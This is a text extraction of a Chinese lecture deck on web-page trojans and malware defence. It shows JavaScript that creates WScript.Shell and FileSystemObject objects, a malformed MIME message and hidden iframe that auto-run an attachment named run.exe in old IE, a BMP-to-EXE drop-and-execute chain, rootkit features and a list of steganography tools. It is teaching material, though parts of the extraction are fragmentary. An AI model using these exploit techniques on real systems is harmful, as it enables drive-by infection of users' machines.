网络安全后门教程.ppt (Network Security Backdoor Tutorial)
2020/12/3, Slide 1: Analysis and Prevention of Malware (Viruses)
Defence
x.asp; x.htm

Slide 36: x.htm
Loading data, this may take 10 to 30 seconds.

Slide 37: x.asp
1 - Look for 1.bmp in the cache
2 - Restore the bmp to an exe
3 - Execute the exe

Slide 38: Carried in a normal web page
Window.open
Onload, onerror

Slide 39: How web-page viruses and web-page trojans work
Javascript.Exception.Exploit: JS + WSH
Incorrect MIME (Multipurpose Internet Mail Extensions) header, IE 5.0 through IE 6.0
EXE to .BMP + Javascript.Exception.Exploit
Exploiting the iframe vulnerability: the parent window can run script code in the context of the child domain, including arbitrary malicious code
Security-certified (signed) CAB and OCX files
Bundling of EXE files

Slide 40: Javascript.Exception.Exploit

    function destroy() {
      try {
        a1 = document.applets[0];
        a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); // WScript.Shell
        a1.createInstance();
        Shl = a1.GetObject();
        a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); // Scripting.FileSystemObject
        a1.createInstance();
        FSO = a1.GetObject();
        a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); // WScript.Network
        a1.createInstance();
        Net = a1.GetObject();
        try { do something; } catch (e) {}
      } catch (e) {}
    }
    function do() {
      setTimeout("destroy()", 1000); // set the run delay to 1 second
    }
    do() // the call that runs the malicious routine

Slide 41: Incorrect MIME (Multipurpose Internet Mail Extensions)

    Content-Type: multipart/related; type="multipart/alternative"; boundary="=B="
    -=B=
    Content-Type: multipart/alternative; boundary="=A="
    -=A=
    Content-Type: text/html;
    Content-Transfer-Encoding: quoted-printable
    -=A=
    -=B=
    Content-Type: audio/x-wav; name="run.exe"    - can be changed to another script file
    Content-Transfer-Encoding: base64
    Content-ID:    - remainder omitted: AAAAA, N+1 of them -

When the message declares its type as audio/x-wav, a vulnerability in IE causes the attachment to be treated as an audio file and opened automatically.

Slide 42: iframe

    <iframe src=run.eml width=0 height=0></iframe>

Slide 43: Startup.html
startup
document.getElementById("clientcall").click()

Slide 44: HTA
HTA stands for HTML Application; see x.asp.

Slide 45: Various overflow vulnerabilities
iframe overflow
Javaprxy.DLL COM object heap overflow vulnerability

Slide 46: The evolution of trojans
Adding rootkit functionality: hiding files, ports, services, processes, etc.
HTTP tunneling
HyDan (hides information inside binary files)

Slide 47:
) Then%
hidden data can be directly read off an audio CD. Includes encryption.
Data Privacy Tools (Freeware) - Uses BMP carrier files and includes encryption.

Slide 62: Hide information in a file
Data Stash (Shareware) - Uses BMP and database carrier files and includes password protection.
Digital Picture Envelope v1.0 (Freeware) - Uses BMP carrier files.
Encrypt Pic (Shareware) - Uses 24-bit BMP carrier files and includes encryption.
Gif-it-Up (Freeware) - Uses GIF carrier files and includes encryption.
Gifshuffle v2.0 (Freeware) - A command-line tool that uses GIF carrier files and includes encryption.
Hermetic Stego (Shareware) - Uses BMP carrier files. The developers claim their stego key makes the payload undetectable.
Hide and Seek for Win95 (Shareware) - Uses BMP carrier files and includes encryption and file wiping.
Hide4PGP v2.0 (Freeware) - A command-line tool that uses BMP, WAV, and VOC carrier files.
Hide In Picture 2.0 (Freeware) - Uses BMP carrier files and includes encryption.
ImageHide (Freeware) - Uses a variety of image carrier files.
In Plain View (Freeware) - Uses BMP carrier files and includes password protection.
In The Picture (Shareware) - Uses BMP carrier files and includes encryption.

Slide 63:
InfoStego (Freeware) - Uses BMP carrier files; includes encryption.
Invisible Secrets v4.0 (Shareware) - Uses JPEG, PNG, BMP, HTML and WAV carrier files. Includes encryption, shredder, password manager and self-decrypting archives.
JPegX (Freeware) - Uses JPEG carrier files and includes encryption and password protection.
JP Hide and Seek (Freeware) - Uses JPEG carrier files and includes encryption.
JSteg Shell v2.0 (Freeware) - Uses JPEG carrier files; includes encryption.
MP3Stego (Freeware) - Uses MP3 carrier files.
PGPn123 (Freeware) - A tool that facilitates using PGP for Eudora, Agent, or Pegasus Mail and also includes a steganography option.
PhotoCrypt 1.1 (Freeware) - Uses BMP carrier files.
Sam's Big Play Maker (Freeware) - A text generation tool that converts a message into an output that looks like a play.
Scramdisk (Freeware) - A disk encryption program that allows the creation and use of virtual encrypted drives.
Scytale 32bit (Freeware) - A PGP shell program that uses PCX carrier files.
SecurEngine 4.0 (Freeware) - Uses BMP, JPEG, WAV, and txt files as carrier files. Includes encryption, file wiping, a password manager, and self-decrypting archives.
Stash-It v1.1 (Freeware) - Uses BMP, GIF, TIFF, PNG or PCX carrier files.
Steghide 0.4.6b (Freeware) - Uses BMP, WAV and AU carrier files. Includes encryption.
Stego-Lame (Freeware) - Uses various audio formats as carrier files. Written in Windows C source code; must be compiled before use.
S-Tools 4 (Freeware) - Uses BMP, GIF, and WAV carrier files; includes password and encryption options.
The Third Eye (Freeware) - Uses BMP, GIF, and PCX carrier fi
